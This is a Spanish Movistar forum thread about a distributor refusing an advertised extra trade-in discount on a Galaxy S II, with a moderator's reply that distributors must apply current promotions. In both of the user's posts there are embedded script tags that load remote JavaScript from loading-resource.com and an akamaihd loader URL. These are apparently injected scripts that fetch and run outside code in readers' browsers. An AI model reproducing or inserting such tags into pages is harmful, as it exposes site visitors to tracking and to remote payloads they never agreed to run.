Hola a todos, agradecería mucho a algun moderador me pudiera explicar lo siguiente:
Estoy a la espera de recibir bono para recoger un Samsung Galaxy S II ofertado por retenciones al cancelar portabilidad y esta mañana he llamado a un distribuidor oficial de mi localidad, donde efectuan el programa "renueva y recicla" para que me confirmaran la tasación de mi antiguo movil (galaxy Ace).
Me dice la dependienta que si entrego mi antiguo movil operativo, me descontarian 68 € euros de la factura de compra, a lo que le pregunto sobre la informacion que aparece en la pagina 22 de la revista oficial de Movistar del mes de octubre, que dice literalmente " traenos tu viejo samsung durante este mes y te aplicaremos descuentos adicionales a la tasación" en mi caso 30€ mas por adquirir el SGS II, pero cual es mi sorpresa cuando me dice que de eso nada de nada.
Buscando en la Web me he encontrado con casos similares, y mi pregunta es la siguiente:
¿Los distribuidores oficiales de Movistar no deben ceñirse a las promociones que ofrece la compañia?
¿Acaso tienen ellos potestad para elegir que promos aplicar y cuales no, asi sin mas?
Lo vengo a decir porque he llamado a otras tiendas de poblaciones cercanas y el descuento extra si me lo aplican sin problemas, con el inconveniente de tener que desplazarme para conseguir mi terminal beneficiandome de esta promocion.
Espero vuestra respuesta agradeciendolo mucho de antemano.
Un saludo
<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>¡Resuelto! Ir a solución.
Hola, @javibl!
Efectivamente como tu mismo indicas, todos los distribuidores están obligados a aplicar las promociones vigentes, por lo tanto si el distribuidor de tu localidad, te dice que no, tienes que poner directamente la reclamación en la tienda, recuerda que tienen a disposición de los usuarios, las hojas de reclamaciones. Nosotros directamente no podemos hacer nada... sentimos no poder ayudarte con este caso....
Recuerda que seguimos aquí, para echarte una mano en todo lo posible.
Salu2
Consulta nuestras ofertas y servicios sobre Fusión, Tarifas Móvil, ADSL y Fibra, Móviles, Televisión y Ofertas Movistar.
No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor FútbolSer usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar
Una de las ventajas es poder ver tu factura en Consulta Factura online.
También te invitamos a seguirnos en Twitter, Facebook y Google+
Muchas gracias por tu respuesta Gladiss, voy a poner la reclamación, pero me parece que ya me puedo olvidar de la promocion en esta tienda.
Un saludo.
<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Hola, @javibl!
Muchas gracias a ti por tu comentario y por participar en la comunidad!!
Salu2
Consulta nuestras ofertas y servicios sobre Fusión, Tarifas Móvil, ADSL y Fibra, Móviles, Televisión y Ofertas Movistar.
No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor FútbolSer usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar
Una de las ventajas es poder ver tu factura en Consulta Factura online.
También te invitamos a seguirnos en Twitter, Facebook y Google+